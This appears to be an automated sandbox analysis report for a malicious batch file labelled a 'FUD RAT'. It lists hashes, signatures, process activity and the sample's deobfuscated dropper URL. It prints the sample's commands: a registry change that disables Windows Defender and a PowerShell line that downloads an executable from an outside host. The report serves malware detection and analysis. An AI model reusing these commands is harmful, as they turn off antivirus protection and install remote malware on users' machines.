Analysis
max time kernel: 16s
max time network: 16s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 24-12-2024 17:24
Static task: static1
Behavioral task: behavioral1
Sample: FUD RAT___Obfuscated.bat
Resource: win7-20240903-en (windows7-x64)
6 signatures, 150 seconds
Behavioral task: behavioral2
Sample: FUD RAT___Obfuscated.bat
Resource: win10v2004-20241007-en (windows10-2004-x64)
13 signatures, 150 seconds
General
Target: FUD RAT___Obfuscated.bat
Size: 463B
MD5: a9fdda2577ff67660be21d0d4cd98179
SHA1: 15432871fed4cbb19ec26eaabcc6b193beebbbfb
SHA256: 8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
SHA512: 0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Score: 10/10
Malware Config
Extracted
Language: ps1
Deobfuscated
URLs
exe.dropper: https://whatsabool.online/kingvonpiracyvirus/load.exe
Signatures
Blocklisted process makes network request (2 IoCs)
flow 5, pid 2832, process powershell.exe
flow 6, pid 2832, process powershell.exe
pid 2832, process powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid 2832, process powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
description: Token: SeDebugPrivilege, pid 2832, process powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
PID 2684 wrote to memory of 2828, process cmd.exe (2684), procid_target 32
PID 2684 wrote to memory of 2828, process cmd.exe (2684), procid_target 32
PID 2684 wrote to memory of 2828, process cmd.exe (2684), procid_target 32
PID 2684 wrote to memory of 2832, process cmd.exe (2684), procid_target 33
PID 2684 wrote to memory of 2832, process cmd.exe (2684), procid_target 33
PID 2684 wrote to memory of 2832, process cmd.exe (2684), procid_target 33
Processes
C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"
  PID: 2684
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    PID: 2828
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
    PID: 2832
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken